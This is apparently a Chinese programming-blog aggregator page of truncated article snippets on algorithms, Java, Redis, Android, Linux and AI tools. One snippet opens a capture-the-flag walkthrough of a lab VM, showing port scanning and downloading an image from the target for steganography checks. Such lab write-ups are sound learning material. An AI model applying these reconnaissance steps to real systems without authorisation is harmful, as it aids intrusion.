    文章目录题目链接:题目描述:解法C++算法代码:题目链接:692.前K个高频单词题目描述:解法利用堆来解决TopK问题预处理一下原始的字符串数组,用一个哈希表统计一下每一个单词出现的频次。创建一个大小为k的堆频次:小根堆字典序(频次相同的时候):大根堆循环让元素依次进堆判断提取结果C++算法代码:classSolution{//定义类型别名,PSI表示对typedefpairPSI;//自定义比较
  • Java | 多线程经典问题 - 售票 Ada54
    一、售票需求1)同一个票池2)多个窗口卖票,不能出售同一张票二、售票问题代码实现(线程与进程小总结,请戳:Java|线程和进程,创建线程)step1:定义SaleWindow类实现Runnable接口,覆盖run方法step2:实例化SaleWindow对象,创建Thread对象,将SaleWindow作为参数传给Thread类的构造函数,然后通过Thread.start()方法启动线程step3
  • 恩小希美食成长日记之118:“摘星女神”王亚平归来,她的婚姻,治愈了多少职场女性的痛 恩小希
    上周最为热闹的消息,无疑是神舟13号的三位航天英雄回来了.其中,最为瞩目的就是王亚平.她是我国首位进行太空行走的女航天员,也是为自己小女儿“摘星星的妈妈”。作为最受关注的职场妈妈,王亚平之所以能够成就这样一番事业,跟背后默默支持她的丈夫--赵鹏分不开。01王亚平1980年出生于山东烟台。父母都是地地道道的农民。王亚平这个姑娘从小体质好,一直练习长跑。高中时,空军来家乡招收女飞行员,作为体育班里唯一
  • 2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲” 上海云盾商务经理杨杨 游戏安全
    副标题:从客户端加密到AI反外挂,拆解全链路防护如何重塑游戏攻防天平引言:当传统高防在手游战场“失效”2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。传统高防IP的致命短板暴露无遗:无法识别伪造客户端流量、难防协议篡改、误杀率超15%。而集成于游戏终端的SDK游戏盾,正以“源
  • CodeFoeces-450B ss5smi
    题目原题链接:B.JzzhuandSequences题意根据公式公式计算对应fn的值。参考了其他作者的代码和思路。找循环点。负数取余需要加取余数到>0为止才可取余。代码#includeusingnamespacestd;constintmod=1e9+7;intmain(){longlongf[10],x,y,n;cin>>x>>y>>n;x=(x+mod)%mod;y=(y+mod)%mod;f
  • 基于redis的Zset实现作者的轻量级排名 周童學 Javaredis数据库缓存
    基于redis的Zset实现轻量级作者排名系统在今天的技术架构中,Redis是一种广泛使用的内存数据存储系统,尤其在需要高效检索和排序的场景中表现优异。在本篇博客中,我们将深入探讨如何使用Redis的有序集合(ZSet)构建一个高效的笔记排行榜系统,并提供相关代码示例和详细的解析。1.功能背景与需求假设我们有一个笔记分享平台,用户可以发布各种笔记,系统需要根据用户发布的笔记数量来生成一个实时更新的
  • Java并发核心:线程池使用技巧与最佳实践! | 多线程篇(五) bug菌¹ Java实战(进阶版)javaJava零基础入门Java并发线程池多线程篇
    本文收录于「Java进阶实战」专栏,专业攻坚指数级提升,希望能够助你一臂之力,帮你早日登顶实现财富自由;同时,欢迎大家关注&&收藏&&订阅!持续更新中,up!up!up!!环境说明:Windows10+IntelliJIDEA2021.3.2+Jdk1.8本文目录前言摘要正文何为线程池?为什么需要线程池?线程池的好处线程池使用场景如何创建线程池?线程池的常见配置源码解析案例分享案例代码演示案例运行
  • Matrix-Breakout 2 Morpheus靶场解题过程
    信息收集目标探测靶机目标很明显就是61.139.2.141了扫描开放端口发现22、80、81访问端口主机访问80翻译一下,并没有发现什么审查源代码发现里面有一张图片,下载下来看看是否有图片的隐写wgethttp://61.139.2.141/trinity.jpegstegoveritas-itrinity.jpeg-o/home/kali/Desktop/11分解后发现什么都没有,里面的keep
  • 代码随想录算法训练营第三十五天
    01背包问题二维题目链接01背包问题二维题解importjava.util.Scanner;publicclassMain{publicstaticvoidmain(String[]args){Scannersc=newScanner(System.in);intM=sc.nextInt();intN=sc.nextInt();int[]space=newint[M];int[]value=new
  • Redis + Caffeine 实现高效的两级缓存架构 周童學 Java缓存redis架构
    Redis+Caffeine实现高效的两级缓存架构引言在现代高并发系统中,缓存是提升系统性能的关键组件之一。传统的单一缓存方案往往难以同时满足高性能和高可用性的需求。本文将介绍如何结合Redis和Caffeine构建一个高效的两级缓存系统,并通过三个版本的演进展示如何逐步优化代码结构。项目源代码:github地址、gitee地址两级缓存架构概述两级缓存通常由本地缓存(如Caffeine)和分布式缓
  • uniapp微信小程序 - 详解微信小程序平台用户授权登录全流程,uniapp v3版本中小程序端开发下用户点击登录后获取手机号/昵称/性别/头像等信息完成登录(提供完整示例代码,一键复制开箱即用) 十一猫咪爱养鱼 前端组件与功能(开箱即用)uniapp常见问题解决uniappvue3uniapp3小程序授权登录微信小程序登录获取用户信息教程获取用户昵称手机号头像信息登录vue3版本小程序平台授权登录uniap小程序端用户登录流程uni完整的小程序平台登录源码
    效果图在uniapp微信小程序端开发中,超详细实现用户授权登录完整功能源码,用户授权后获取手机号/昵称/头像/性别等,提供完整思路流程及逻辑讲解。uniappVue3和Vue2都能用,你也可以直接复制粘贴,然后改下参数放到你的项目中去就行。整体思路做功能之前,先来看一下整体流程是
  • 【Coze搞钱实战】3. 避坑指南:对话流设计中的6个致命错误(真实案例) AI_DL_CODE Coze平台对话流设计客服Bot避坑用户流失封号风险智能客服配置故障修复指南
    摘要:对话流设计是智能客服Bot能否落地的核心环节,直接影响用户体验与业务安全。本文基于50+企业Bot部署故障分析,聚焦导致用户流失、投诉甚至封号的6大致命错误:无限循环追问、人工移交超时、敏感词过滤缺失、知识库冲突、未处理否定意图、跨平台适配失败。通过真实案例拆解每个错误的表现形式、技术根因及工业级解决方案,提供可直接复用的Coze配置代码、工作流模板和检测工具。文中包含对话流健康度检测工具使
  • 微信公众号回调java_处理微信公众号消息回调 weixin_39607620 微信公众号回调java
    1、背景在上一节中,咱们知道如何接入微信公众号,可是以后公众号会与咱们进行交互,那么微信公众号如何通知到咱们本身的服务器呢?咱们知道咱们接入的时候提供的url是GET/mp/entry,那么公众号以后产生的事件将会以POST/mp/entry发送到咱们本身的服务器上。html2、代码实现,此处仍是使用weixin-java-mp这个框架实现一、引入weixin-java-mpcom.github.
  • Deepseek技术深化:驱动大数据时代颠覆性变革的未来引擎 荣华富贵8 springboot搜索引擎后端缓存redis
    在大数据时代,信息爆炸和数据驱动的决策逐渐重塑各行各业。作为一项前沿技术,Deepseek正在引领新一轮技术革新,颠覆传统数据处理与分析方式。本文将从理论原理、应用场景和前沿代码实践三个层面,深入剖析Deepseek技术如何为大数据时代提供颠覆性变革的解决方案。一、技术背景与核心思想1.1大数据挑战与机遇在数据量呈指数级增长的背景下,传统数据处理方法面临数据存储、计算效率和信息提取精度的诸多挑战。
  • Qwen3 大模型实战:使用 vLLM 部署与函数调用(Function Call)全攻略 曦紫沐 大模型大模型部署Qwen3vLLM函数调用
    文章摘要本文将带你从零开始,深入掌握如何使用Qwen3-8B大语言模型,结合vLLM进行高性能部署,并通过函数调用(FunctionCall)实现模型与外部工具的智能联动。我们将详细讲解部署命令、调用方式、代码示例及实际应用场景,帮助你快速构建基于Qwen3的智能应用。一、Qwen3简介与部署环境准备Qwen3是通义千问系列的最新一代大语言模型,具备强大的自然语言理解和生成能力,尤其在函数调用、工
  • Pandas:数据科学的超级瑞士军刀 科技林总 DeepSeek学AI人工智能
    **——从零基础到高效分析的进化指南**###**一、Pandas诞生:数据革命的救世主****2010年前的数据分析噩梦**:```python#传统Python处理表格数据data=[]forrowincsv_file:ifrow[3]>100androw[2]=="China":data.append(float(row[5])#代码冗长易错!```**核心痛点**:-Excel处理百万行崩
  • Zread.AI:一键将GitHub项目转化为结构化中文手册的AI代码维基工具
    Zread.AI:一键将GitHub项目转化为结构化中文手册的AI代码维基工具文章来源:PoixeAI文章目录Zread.AI工具概述核心功能优势亮点典型应用场景上手指南注意事项官网地址Zread.AI由智谱Z.ai推出,是一款面向开发者的AI代码维基工具,可在几秒内把任何公开GitHub仓库转化为结构化中文手册,并通过独家Buzz面板聚合commits、issues与相关新闻,让项目脉搏一目了然
  • Android GreenDao介绍和Generator生成表对象代码
    目录(?)[-]介绍创建工程转载请注明:http://blog.csdn.net/sinat_30276961/article/details/50052109最近无意中发现了GreenDao,然后查看了一些资料后,发现这个数据库框架很适合用,于是乎,查看了官网的api,并自己写了一个小应用总结一下它的使用方法。介绍按照国际惯例,在开篇,总要先介绍一下什么是GreenDao吧。首先需要说明的是Gr
  • 程序员必备:10 个提升代码质量的工具 大力出奇迹985 宠物
    在软件开发过程中,代码质量对项目的成功起着决定性作用。高质量的代码不仅易于维护和扩展,还能有效降低成本并提升可靠性。本文精心挑选了10个程序员必备工具,助力提升代码质量。这些工具涵盖代码格式化、静态分析、代码审查、测试、性能优化、安全扫描、版本控制、依赖管理、代码生成以及文档生成等多个关键领域。通过使用它们,开发者能够高效地发现并解决代码中的潜在问题,遵循最佳实践,提升代码的可读性、可维护性与安全
  • 用代码生成艺术字:设计个性化海报的秘密
    本文围绕“用代码生成艺术字:设计个性化海报的秘密”展开,先概述代码生成艺术字在海报设计中的独特价值,接着介绍常用的代码工具(如HTML、CSS、JavaScript等),详细阐述从构思到实现的完整流程,包括字体样式设计、动态效果添加等,还分享了提升艺术字质感的技巧及实际案例。最后总结代码生成艺术字的优势,为设计师提供打造个性化海报的实用指南,助力提升海报设计的独特性与吸引力,符合搜索引擎SEO标准
  • 用 Python 开发小游戏:零基础也能做出《贪吃蛇》
    本文专为零基础学习者打造,详细介绍如何用Python开发经典小游戏《贪吃蛇》。无需复杂编程知识,从环境搭建到代码编写、功能实现,逐步讲解核心逻辑与操作。涵盖Pygame库的基础运用、游戏界面设计、蛇的移动与食物生成规则等,让新手能按步骤完成开发,同时融入SEO优化要点,帮助读者轻松入门Python游戏开发,体验从0到1做出游戏的乐趣。一、为什么选择用Python开发《贪吃蛇》对于零基础学习者来说,
  • AI人工智能中的数据挖掘:提升智能决策能力
    AI人工智能中的数据挖掘:提升智能决策能力关键词:数据挖掘、人工智能、机器学习、智能决策、数据分析、特征工程、模型优化摘要:本文深入探讨了数据挖掘在人工智能领域中的核心作用,重点分析了如何通过数据挖掘技术提升智能决策能力。文章从基础概念出发,详细介绍了数据挖掘的关键算法、数学模型和实际应用场景,并通过Python代码示例展示了数据挖掘的全流程。最后,文章展望了数据挖掘技术的未来发展趋势和面临的挑战
  • C#中的设计模式:构建更加优雅的代码 Envyᥫᩣᩚ c#开发语言
    C#在面向对象编程(OOP)方面的强大支持,我们可以探讨“C#中的设计模式”。这不仅有助于理解如何更好地组织代码,还能提高代码的可维护性和可扩展性。引言设计模式是软件工程中经过实践验证的解决方案模板,它们提供了一种标准化的方法来解决常见的开发问题。对于使用C#进行开发的程序员来说,理解和应用这些模式可以帮助创建结构良好、易于维护和扩展的应用程序。本文将介绍几种常用的设计模式,并展示如何用C#实现它
  • Jupyter Notebook:数据科学的“瑞士军刀” a小胡哦 机器学习基础人工智能机器学习
    在数据科学的世界里,JupyterNotebook是一个不可或缺的工具,它就像是数据科学家手中的“瑞士军刀”,功能强大且灵活多变。今天,就让我们一起深入了解这个神奇的工具。一、JupyterNotebook是什么?JupyterNotebook是一个开源的Web应用程序,它允许你创建和共享包含实时代码、方程、可视化和解释性文本的文档。它支持多种编程语言,其中Python是最常用的语言之一。Jupy
  • 大学生入门:初识方法及其易踩坑的点
    在java学习过程中,我们不难发现有很多重复使用的功能代码块,每次使用如果都要重新写一遍,岂不是很麻烦,就算是“cv”大法,感觉也不是很方便,那么,有什么办法可以解决这个问题呢?方法!java中,一段可重用的,用于执行特定功能的代码块叫做方法,它可以接收参数、返回结果,并且可以被多次使用。一、方法的基本结构[修饰符]返回值类型方法名([参数列表])[throws异常类型]{//方法体}[throw
  • java线程Thread和Runnable区别和联系 zx_code javajvmthread多线程Runnable
    我们都晓得java实现线程2种方式,一个是继承Thread,另一个是实现Runnable。 模拟窗口买票,第一例子继承thread,代码如下 package thread; public class ThreadTest { public static void main(String[] args) { Thread1 t1 = new Thread1(
  • 【转】JSON与XML的区别比较 丁_新 jsonxml
    1.定义介绍 (1).XML定义 扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML使用DTD(document type definition)文档类型定义来组织数据;格式统一,跨平台和语言,早已成为业界公认的标准。 XML是标
  • c++ 实现五种基础的排序算法 CrazyMizzz C++c算法
    #include<iostream> using namespace std; //辅助函数,交换两数之值 template<class T> void mySwap(T &x, T &y){ T temp = x; x = y; y = temp; } const int size = 10; //一、用直接插入排
  • 我的软件 麦田的设计者 我的软件音乐类娱乐放松
         这是我写的一款app软件,耗时三个月,是一个根据央视节目开门大吉改变的,提供音调,猜歌曲名。1、手机拥有者在android手机市场下载本APP,同意权限,安装到手机上。2、游客初次进入时会有引导页面提醒用户注册。(同时软件自动播放背景音乐)。3、用户登录到主页后,会有五个模块。a、点击不胫而走,用户得到开门大吉首页部分新闻,点击进入有新闻详情。b、
  • linux awk命令详解 被触发 linux awk
    awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息 awk处理过程: 依次对每一行进行处理,然后输出 awk命令形式: awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END{}’ file [-F|-f|-v]大参数,-F指定分隔符,-f调用脚本,-v定义变量 var=val
  • 各种语言比较 _wy_ 编程语言
                        Java Ruby PHP 擅长领域                  
  • oracle 中数据类型为clob的编辑 知了ing oracle clob
    public void updateKpiStatus(String kpiStatus,String taskId){ Connection dbc=null; Statement stmt=null; PreparedStatement ps=null; try { dbc = new DBConn().getNewConnection(); //stmt = db
  • 分布式服务框架 Zookeeper -- 管理分布式环境中的数据 矮蛋蛋 zookeeper
    原文地址: http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/ 安装和配置详解 本文介绍的 Zookeeper 是以 3.2.2 这个稳定版本为基础,最新的版本可以通过官网 http://hadoop.apache.org/zookeeper/来获取,Zookeeper 的安装非常简单,下面将从单机模式和集群模式两
  • tomcat数据源 alafqq tomcat
    数据库 JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。 没有使用JNDI时我用要这样连接数据库: 03.  Class.forName("com.mysql.jdbc.Driver");  04.  conn
  • 遍历的方法 百合不是茶 遍历
                                                          遍历 在java的泛
  • linux查看硬件信息的命令 bijian1013 linux
    linux查看硬件信息的命令 一.查看CPU: cat /proc/cpuinfo   二.查看内存: free   三.查看硬盘: df   linux下查看硬件信息 1、lspci 列出所有PCI 设备; lspci - list all PCI devices:列出机器中的PCI设备(声卡、显卡、Modem、网卡、USB、主板集成设备也能
  • java常见的ClassNotFoundException bijian1013 java
    1.java.lang.ClassNotFoundException: org.apache.commons.logging.LogFactory   添加包common-logging.jar2.java.lang.ClassNotFoundException: javax.transaction.Synchronization    
  • 【Gson五】日期对象的序列化和反序列化 bit1129 反序列化
    对日期类型的数据进行序列化和反序列化时,需要考虑如下问题:   1. 序列化时,Date对象序列化的字符串日期格式如何 2. 反序列化时,把日期字符串序列化为Date对象,也需要考虑日期格式问题 3. Date A -> str -> Date B,A和B对象是否equals   默认序列化和反序列化     import com
  • 【Spark八十六】Spark Streaming之DStream vs. InputDStream bit1129 Stream
      1. DStream的类说明文档:   /** * A Discretized Stream (DStream), the basic abstraction in Spark Streaming, is a continuous * sequence of RDDs (of the same type) representing a continuous st
  • 通过nginx获取header信息 ronin47 nginx header
    1. 提取整个的Cookies内容到一个变量,然后可以在需要时引用,比如记录到日志里面, if ( $http_cookie ~* "(.*)$") {         set $all_cookie $1; }     变量$all_cookie就获得了cookie的值,可以用于运算了
  • java-65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 bylijinnan java
    参考了网上的http://blog.csdn.net/peasking_dd/article/details/6342984 写了个java版的: public class Print_1_To_NDigit { /** * Q65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 * 1.使用字符串
  • Netty源码学习-ReplayingDecoder bylijinnan javanetty
    ReplayingDecoder是FrameDecoder的子类,不熟悉FrameDecoder的,可以先看看 http://bylijinnan.iteye.com/blog/1982618 API说,ReplayingDecoder简化了操作,比如: FrameDecoder在decode时,需要判断数据是否接收完全: public class IntegerH
  • js特殊字符过滤 cngolon js特殊字符js特殊字符过滤
    1.js中用正则表达式 过滤特殊字符, 校验所有输入域是否含有特殊符号function stripscript(s) {    var pattern = new RegExp("[`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()&mdash;—|{}【】‘;:”“'。,、?]"
  • hibernate使用sql查询 ctrain Hibernate
    import java.util.Iterator; import java.util.List; import java.util.Map; import org.hibernate.Hibernate; import org.hibernate.SQLQuery; import org.hibernate.Session; import org.hibernate.Transa
  • linux shell脚本中切换用户执行命令方法 daizj linuxshell命令切换用户
    经常在写shell脚本时,会碰到要以另外一个用户来执行相关命令,其方法简单记下:   1、执行单个命令:su - user -c "command" 如:下面命令是以test用户在/data目录下创建test123目录 [root@slave19 /data]# su - test -c "mkdir /data/test123" 
  • 好的代码里只要一个 return 语句 dcj3sjt126com return
    别再这样写了:public boolean foo() {    if (true) {         return true;     } else {          return false;    
  • Android动画效果学习 dcj3sjt126com android
    1、透明动画效果 方法一:代码实现 public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.fragment_main, container, fals
  • linux复习笔记之bash shell (4)管道命令 eksliang linux管道命令汇总linux管道命令linux常用管道命令
    转载请出自出处: http://eksliang.iteye.com/blog/2105461     bash命令执行的完毕以后,通常这个命令都会有返回结果,怎么对这个返回的结果做一些操作呢?那就得用管道命令‘|’。     上面那段话,简单说了下管道命令的作用,那什么事管道命令呢?     答:非常的经典的一句话,记住了,何为管
  • Android系统中自定义按键的短按、双击、长按事件 gqdy365 android
    在项目中碰到这样的问题: 由于系统中的按键在底层做了重新定义或者新增了按键,此时需要在APP层对按键事件(keyevent)做分解处理,模拟Android系统做法,把keyevent分解成: 1、单击事件:就是普通key的单击; 2、双击事件:500ms内同一按键单击两次; 3、长按事件:同一按键长按超过1000ms(系统中长按事件为500ms); 4、组合按键:两个以上按键同时按住;
  • asp.net获取站点根目录下子目录的名称 hvt .netC#asp.nethovertreeWeb Forms
    使用Visual Studio建立一个.aspx文件(Web Forms),例如hovertree.aspx,在页面上加入一个ListBox代码如下: <asp:ListBox runat="server" ID="lbKeleyiFolder" />   那么在页面上显示根目录子文件夹的代码如下: string[] m_sub
  • Eclipse程序员要掌握的常用快捷键 justjavac javaeclipse快捷键ide
      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。   曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  写道 程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可
  • c++编程随记 lx.asymmetric C++笔记
     为了字体更好看,改变了格式……   &&运算符:   #include<iostream> using namespace std; int main(){      int a=-1,b=4,k;      k=(++a<0)&&!(b--
  • linux标准IO缓冲机制研究 音频数据 linux
    一、什么是缓存I/O(Buffered I/O)缓存I/O又被称作标准I/O,大多数文件系统默认I/O操作都是缓存I/O。在Linux的缓存I/O机制中,操作系统会将I/O的数据缓存在文件系统的页缓存(page cache)中,也就是说,数据会先被拷贝到操作系统内核的缓冲区中,然后才会从操作系统内核的缓冲区拷贝到应用程序的地址空间。1.缓存I/O有以下优点:A.缓存I/O使用了操作系统内核缓冲区,
  • 随想 生活 暗黑小菠萝 生活
    其实账户之前就申请了,但是决定要自己更新一些东西看也是最近。从毕业到现在已经一年了。没有进步是假的,但是有多大的进步可能只有我自己知道。   毕业的时候班里12个女生,真正最后做到软件开发的只要两个包括我,PS:我不是说测试不好。当时因为考研完全放弃找工作,考研失败,我想这只是我的借口。那个时候才想到为什么大学的时候不能好好的学习技术,增强自己的实战能力,以至于后来找工作比较费劲。我
  • 我认为POJO是一个错误的概念 windshome javaPOJO编程J2EE设计
                  这篇内容其实没有经过太多的深思熟虑,只是个人一时的感觉。从个人风格上来讲,我倾向简单质朴的设计开发理念;从方法论上,我更加倾向自顶向下的设计;从做事情的目标上来看,我追求质量优先,更愿意使用较为保守和稳妥的理念和方法。    &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他